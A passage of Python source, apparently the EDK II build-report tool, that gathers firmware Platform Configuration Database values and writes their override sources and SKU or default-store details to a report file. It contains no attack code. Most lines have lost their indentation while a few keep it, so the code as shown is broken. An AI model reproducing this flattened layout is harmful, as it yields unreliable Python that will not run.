FileWrite(File, "PCI Vendor ID: %s" % self.PciVendorId)
if self.PciClassCode:
FileWrite(File, "PCI Class Code: %s" % self.PciClassCode)
FileWrite(File, gSectionSep)
if "PCD" in ReportType:
GlobalPcdReport.GenerateReport(File, self.ModulePcdSet)
if "LIBRARY" in ReportType:
self.LibraryReport.GenerateReport(File)
if "DEPEX" in ReportType:
self.DepexReport.GenerateReport(File, GlobalDepexParser)
if "BUILD_FLAGS" in ReportType:
self.BuildFlagsReport.GenerateReport(File)
if "FIXED_ADDRESS" in ReportType and self.FileGuid:
GlobalPredictionReport.GenerateReport(File, self.FileGuid)
FileWrite(File, gSectionEnd)
def ReadMessage(From, To, ExitFlag):
while True:
        # read one line at a time
        Line = From.readline()
        # an empty read means "end of stream"
        if Line is not None and Line != b"":
            To(Line.rstrip())
        else:
            break
        if ExitFlag.is_set():
break
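#
# Illustrative sketch (comment only): ReadMessage is meant to drain one pipe of a
# child process from a separate thread, mirroring how ModuleReport.GenerateReport
# redirects the stderr of GenFw above, e.g.
#
#   Done = threading.Event()
#   Proc = subprocess.Popen(Cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
#   threading.Thread(target=ReadMessage, args=(Proc.stderr, EdkLogger.quiet, Done)).start()
#   Proc.wait()
#   Done.set()
#
# "Cmd" is a hypothetical command line string.
#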
##
# Reports platform and module PCD information
#
# This class reports the platform PCD section and module PCD subsection
# in the build report file.
#
class PcdReport(object):
##
# Constructor function for class PcdReport
#
    # This constructor function generates a PcdReport object for a platform build.
# It collects the whole PCD database from platform DSC files, platform
# flash description file and package DEC files.
#
# @param self The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self.AllPcds = {}
self.UnusedPcds = {}
self.ConditionalPcds = {}
self.MaxLen = 0
self.Arch = None
if Wa.FdfProfile:
self.FdfPcdSet = Wa.FdfProfile.PcdDict
else:
self.FdfPcdSet = {}
self.DefaultStoreSingle = True
self.SkuSingle = True
if GlobalData.gDefaultStores and len(GlobalData.gDefaultStores) > 1:
self.DefaultStoreSingle = False
if GlobalData.gSkuids and len(GlobalData.gSkuids) > 1:
self.SkuSingle = False
self.ModulePcdOverride = {}
for Pa in Wa.AutoGenObjectList:
self.Arch = Pa.Arch
#
            # Collect all platform-referenced PCDs and group them by PCD token space
            # GUID C name
#
for Pcd in Pa.AllPcdList:
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
if len(Pcd.TokenCName) > self.MaxLen:
self.MaxLen = len(Pcd.TokenCName)
#
            # Collect the PCDs defined in the DSC/FDF files but not used by any module
#
UnusedPcdFullList = []
for item in Pa.Platform.Pcds:
Pcd = Pa.Platform.Pcds[item]
if not Pcd.Type:
                    # first check whether the PCD from the FDF file is used by any module
for T in PCD_TYPE_LIST:
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(T, [])
if Pcd in PcdList:
Pcd.Type = T
break
if not Pcd.Type:
PcdTypeFlag = False
for package in Pa.PackageList:
for T in PCD_TYPE_LIST:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T) in package.Pcds:
Pcd.Type = T
PcdTypeFlag = True
if not Pcd.DatumType:
Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T)].DatumType
break
if PcdTypeFlag:
break
if not Pcd.DatumType:
PcdType = Pcd.Type
# Try to remove Hii and Vpd suffix
if PcdType.startswith(TAB_PCDS_DYNAMIC_EX):
PcdType = TAB_PCDS_DYNAMIC_EX
elif PcdType.startswith(TAB_PCDS_DYNAMIC):
PcdType = TAB_PCDS_DYNAMIC
for package in Pa.PackageList:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType) in package.Pcds:
Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType)].DatumType
break
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
UnusedPcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd in UnusedPcdList:
UnusedPcdList.remove(Pcd)
if Pcd not in PcdList and Pcd not in UnusedPcdFullList:
UnusedPcdFullList.append(Pcd)
if len(Pcd.TokenCName) > self.MaxLen:
self.MaxLen = len(Pcd.TokenCName)
if GlobalData.gConditionalPcds:
for PcdItem in GlobalData.gConditionalPcds:
if '.' in PcdItem:
(TokenSpaceGuidCName, TokenCName) = PcdItem.split('.')
if (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
Pcd = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)]
PcdList = self.ConditionalPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
UnusedPcdList = []
if UnusedPcdFullList:
for Pcd in UnusedPcdFullList:
if Pcd.TokenSpaceGuidCName + '.' + Pcd.TokenCName in GlobalData.gConditionalPcds:
continue
UnusedPcdList.append(Pcd)
for Pcd in UnusedPcdList:
PcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
for Module in Pa.Platform.Modules.values():
#
# Collect module override PCDs
#
for ModulePcd in Module.M.ModulePcdList + Module.M.LibraryPcdList:
TokenCName = ModulePcd.TokenCName
TokenSpaceGuid = ModulePcd.TokenSpaceGuidCName
ModuleDefault = ModulePcd.DefaultValue
ModulePath = os.path.basename(Module.M.MetaFile.File)
self.ModulePcdOverride.setdefault((TokenCName, TokenSpaceGuid), {})[ModulePath] = ModuleDefault
#
# Collect PCD DEC default value.
#
self.DecPcdDefault = {}
self._GuidDict = {}
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
Guids = Package.Guids
self._GuidDict.update(Guids)
for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
self.DecPcdDefault.setdefault((TokenCName, TokenSpaceGuidCName, DecType), DecDefaultValue)
#
# Collect PCDs defined in DSC common section
#
self.DscPcdDefault = {}
for Pa in Wa.AutoGenObjectList:
for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DscDefaultValue
if DscDefaultValue:
self.DscPcdDefault[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
def GenerateReport(self, File, ModulePcdSet):
if not ModulePcdSet:
if self.ConditionalPcds:
self.GenerateReportDetail(File, ModulePcdSet, 1)
if self.UnusedPcds:
IsEmpty = True
for Token in self.UnusedPcds:
TokenDict = self.UnusedPcds[Token]
for Type in TokenDict:
if TokenDict[Type]:
IsEmpty = False
break
if not IsEmpty:
break
if not IsEmpty:
self.GenerateReportDetail(File, ModulePcdSet, 2)
self.GenerateReportDetail(File, ModulePcdSet)
##
# Generate report for PCD information
#
    # This function generates the PCD detail report for a platform build
    # or for an individual module.
#
# @param self The object pointer
# @param File The file object for report
# @param ModulePcdSet Set of all PCDs referenced by module or None for
# platform PCD report
    # @param ReportSubType   0 means platform/module PCD report, 1 means Conditional
    #                        directives section report, 2 means Unused Pcds section report
#
def GenerateReportDetail(self, File, ModulePcdSet, ReportSubType = 0):
PcdDict = self.AllPcds
if ReportSubType == 1:
PcdDict = self.ConditionalPcds
elif ReportSubType == 2:
PcdDict = self.UnusedPcds
if not ModulePcdSet:
FileWrite(File, gSectionStart)
if ReportSubType == 1:
FileWrite(File, "Conditional Directives used by the build system")
elif ReportSubType == 2:
FileWrite(File, "PCDs not used by modules or in conditional directives")
else:
FileWrite(File, "Platform Configuration Database Report")
FileWrite(File, " *B - PCD override in the build option")
FileWrite(File, " *P - Platform scoped PCD override in DSC file")
FileWrite(File, " *F - Platform scoped PCD override in FDF file")
if not ReportSubType:
FileWrite(File, " *M - Module scoped PCD override")
FileWrite(File, gSectionSep)
else:
if not ReportSubType and ModulePcdSet:
#
# For module PCD sub-section
#
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_PCD)
FileWrite(File, gSubSectionSep)
AllPcdDict = {}
for Key in PcdDict:
AllPcdDict[Key] = {}
for Type in PcdDict[Key]:
for Pcd in PcdDict[Key][Type]:
AllPcdDict[Key][(Pcd.TokenCName, Type)] = Pcd
for Key in sorted(AllPcdDict):
#
# Group PCD by their token space GUID C Name
#
First = True
for PcdTokenCName, Type in sorted(AllPcdDict[Key]):
#
# Group PCD by their usage type
#
Pcd = AllPcdDict[Key][(PcdTokenCName, Type)]
TypeName, DecType = gPcdTypeMap.get(Type, ("", Type))
MixedPcdFlag = False
if GlobalData.MixedPcd:
for PcdKey in GlobalData.MixedPcd:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName) in GlobalData.MixedPcd[PcdKey]:
PcdTokenCName = PcdKey[0]
MixedPcdFlag = True
if MixedPcdFlag and not ModulePcdSet:
continue
#
# Get PCD default value and their override relationship
#
DecDefaultValue = self.DecPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, DecType))
DscDefaultValue = self.DscPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName))
DscDefaultValBak = DscDefaultValue
Field = ''
for (CName, Guid, Field) in self.FdfPcdSet:
if CName == PcdTokenCName and Guid == Key:
DscDefaultValue = self.FdfPcdSet[(CName, Guid, Field)]
break
if DscDefaultValue != DscDefaultValBak:
try:
DscDefaultValue = ValueExpressionEx(DscDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression as DscDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" %(DscDefaultValue, Pcd.DatumType))
InfDefaultValue = None
PcdValue = DecDefaultValue
if DscDefaultValue:
PcdValue = DscDefaultValue
                # The DefaultValue of a structure PCD is already up to date; no need to update it.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
if ModulePcdSet is not None:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type) not in ModulePcdSet:
continue
InfDefaultValue, PcdValue = ModulePcdSet[Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type]
                    # The DefaultValue of a structure PCD is already up to date; no need to update it.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
if InfDefaultValue:
try:
InfDefaultValue = ValueExpressionEx(InfDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression as InfDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" % (InfDefaultValue, Pcd.DatumType))
if InfDefaultValue == "":
InfDefaultValue = None
BuildOptionMatch = False
if GlobalData.BuildOptionPcd:
for pcd in GlobalData.BuildOptionPcd:
if (Pcd.TokenSpaceGuidCName, Pcd.TokenCName) == (pcd[0], pcd[1]):
if pcd[2]:
continue
PcdValue = pcd[3]
                            # The DefaultValue of a structure PCD is already up to date; no need to update it.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
BuildOptionMatch = True
break
if First:
if ModulePcdSet is None:
FileWrite(File, "")
FileWrite(File, Key)
First = False
if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
PcdValueNumber = int(PcdValue.strip(), 0)
if DecDefaultValue is None:
DecMatch = True
else:
DecDefaultValueNumber = int(DecDefaultValue.strip(), 0)
DecMatch = (DecDefaultValueNumber == PcdValueNumber)
if InfDefaultValue is None:
InfMatch = True
else:
InfDefaultValueNumber = int(InfDefaultValue.strip(), 0)
InfMatch = (InfDefaultValueNumber == PcdValueNumber)
if DscDefaultValue is None:
DscMatch = True
else:
DscDefaultValueNumber = int(DscDefaultValue.strip(), 0)
DscMatch = (DscDefaultValueNumber == PcdValueNumber)
else:
if DecDefaultValue is None:
DecMatch = True
else:
DecMatch = (DecDefaultValue.strip() == PcdValue.strip())
if InfDefaultValue is None:
InfMatch = True
else:
InfMatch = (InfDefaultValue.strip() == PcdValue.strip())
if DscDefaultValue is None:
DscMatch = True
else:
DscMatch = (DscDefaultValue.strip() == PcdValue.strip())
IsStructure = False
if self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
IsStructure = True
if TypeName in ('DYNVPD', 'DEXVPD'):
SkuInfoList = Pcd.SkuInfoList
Pcd = GlobalData.gStructurePcd[self.Arch][(Pcd.TokenCName, Pcd.TokenSpaceGuidCName)]
Pcd.DatumType = Pcd.StructName
if TypeName in ('DYNVPD', 'DEXVPD'):
Pcd.SkuInfoList = SkuInfoList
if Pcd.PcdValueFromComm or Pcd.PcdFieldValueFromComm:
BuildOptionMatch = True
DecMatch = False
elif Pcd.PcdValueFromFdf or Pcd.PcdFieldValueFromFdf:
DscDefaultValue = True
DscMatch = True
DecMatch = False
elif Pcd.SkuOverrideValues:
DscOverride = False
if Pcd.DefaultFromDSC:
DscOverride = True
else:
DictLen = 0
for item in Pcd.SkuOverrideValues:
DictLen += len(Pcd.SkuOverrideValues[item])
if not DictLen:
DscOverride = False
else:
if not Pcd.SkuInfoList:
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
for Data in OverrideValues.values():
Struct = list(Data.values())
if Struct:
DscOverride = self.ParseStruct(Struct[0])
break
else:
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
if TypeName in ('DYNHII', 'DEXHII'):
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
OverrideValues = Pcd.SkuOverrideValues[Sku]
DscOverride = self.ParseStruct(OverrideValues[DefaultStore])
if DscOverride:
break
else:
OverrideValues = Pcd.SkuOverrideValues[Sku]
if OverrideValues:
Keys = list(OverrideValues.keys())
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]])
DscOverride = self.ParseStruct(OverrideFieldStruct)
if DscOverride:
break
if DscOverride:
DscDefaultValue = True
DscMatch = True
DecMatch = False
else:
DecMatch = True
else:
DscDefaultValue = True
DscMatch = True
DecMatch = False
#
# Report PCD item according to their override relationship
#
if Pcd.DatumType == 'BOOLEAN':
if DscDefaultValue:
DscDefaultValue = str(int(DscDefaultValue, 0))
if DecDefaultValue:
DecDefaultValue = str(int(DecDefaultValue, 0))
if InfDefaultValue:
InfDefaultValue = str(int(InfDefaultValue, 0))
if Pcd.DefaultValue:
Pcd.DefaultValue = str(int(Pcd.DefaultValue, 0))
if DecMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, ' ')
elif InfDefaultValue and InfMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
elif BuildOptionMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*B')
else:
if DscDefaultValue and DscMatch:
if (Pcd.TokenCName, Key, Field) in self.FdfPcdSet:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*F')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*P')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
if ModulePcdSet is None:
if IsStructure:
continue
                    if TypeName not in ('PATCH', 'FLAG', 'FIXED'):
continue
if not BuildOptionMatch:
ModuleOverride = self.ModulePcdOverride.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName), {})
for ModulePath in ModuleOverride:
ModuleDefault = ModuleOverride[ModulePath]
if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
ModulePcdDefaultValueNumber = int(ModuleDefault.strip(), 0)
Match = (ModulePcdDefaultValueNumber == PcdValueNumber)
if Pcd.DatumType == 'BOOLEAN':
ModuleDefault = str(ModulePcdDefaultValueNumber)
else:
Match = (ModuleDefault.strip() == PcdValue.strip())
if Match:
continue
IsByteArray, ArrayList = ByteArrayForamt(ModuleDefault.strip())
if IsByteArray:
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
Value = ModuleDefault.strip()
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, Value))
if ModulePcdSet is None:
FileWrite(File, gSectionEnd)
else:
if not ReportSubType and ModulePcdSet:
FileWrite(File, gSubSectionEnd)
def ParseStruct(self, struct):
HasDscOverride = False
if struct:
for _, Values in struct.items():
for Key, value in Values.items():
if value[1] and value[1].endswith('.dsc'):
HasDscOverride = True
break
                if HasDscOverride:
break
return HasDscOverride
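    #
    # Illustrative sketch (comment only): the nested override dictionary maps a scope
    # to {field: (value, source-file, line)} tuples; ParseStruct reports True as soon
    # as any field's source file ends in '.dsc'. The names below are hypothetical:
    #
    #   Overrides = {'Scope': {'Field1': ('0x1', 'Platform.dsc', 10)}}
    #   self.ParseStruct(Overrides)   # True: Field1 is overridden from a DSC file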
def PrintPcdDefault(self, File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue):
if not DscMatch and DscDefaultValue is not None:
Value = DscDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', Value))
if not InfMatch and InfDefaultValue is not None:
Value = InfDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', Value))
if not DecMatch and DecDefaultValue is not None:
Value = DecDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', Value))
if IsStructure:
for filedvalues in Pcd.DefaultValues.values():
self.PrintStructureInfo(File, filedvalues)
if DecMatch and IsStructure:
for filedvalues in Pcd.DefaultValues.values():
self.PrintStructureInfo(File, filedvalues)
def PrintPcdValue(self, File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, Flag = ' '):
if not Pcd.SkuInfoList:
Value = Pcd.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
if IsStructure:
FiledOverrideFlag = False
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
for Data in OverrideValues.values():
Struct = list(Data.values())
if Struct:
OverrideFieldStruct = self.OverrideFieldValue(Pcd, Struct[0])
self.PrintStructureInfo(File, OverrideFieldStruct)
FiledOverrideFlag = True
break
if not FiledOverrideFlag and (Pcd.PcdFieldValueFromComm or Pcd.PcdFieldValueFromFdf):
OverrideFieldStruct = self.OverrideFieldValue(Pcd, {})
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
FirstPrint = True
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
SkuIdName = SkuInfo.SkuIdName
if TypeName in ('DYNHII', 'DEXHII'):
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
Value = SkuInfo.DefaultStoreDict[DefaultStore]
IsByteArray, ArrayList = ByteArrayForamt(Value)
if Pcd.DatumType == 'BOOLEAN':
Value = str(int(Value, 0))
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
else:
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
FileWrite(File, '%*s: %s: %s' % (self.MaxLen + 4, SkuInfo.VariableGuid, SkuInfo.VariableName, SkuInfo.VariableOffset))
if IsStructure:
OverrideValues = Pcd.SkuOverrideValues[Sku]
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[DefaultStore])
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
Value = SkuInfo.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if Pcd.DatumType == 'BOOLEAN':
Value = str(int(Value, 0))
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
else:
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
if TypeName in ('DYNVPD', 'DEXVPD'):
FileWrite(File, '%*s' % (self.MaxLen + 4, SkuInfo.VpdOffset))
VPDPcdItem = (Pcd.TokenSpaceGuidCName + '.' + PcdTokenCName, SkuIdName, SkuInfo.VpdOffset, Pcd.MaxDatumSize, SkuInfo.DefaultValue)
if VPDPcdItem not in VPDPcdList:
VPDPcdList.append(VPDPcdItem)
if IsStructure:
FiledOverrideFlag = False
OverrideValues = Pcd.SkuOverrideValues[Sku]
if OverrideValues:
                            Keys = list(OverrideValues.keys())
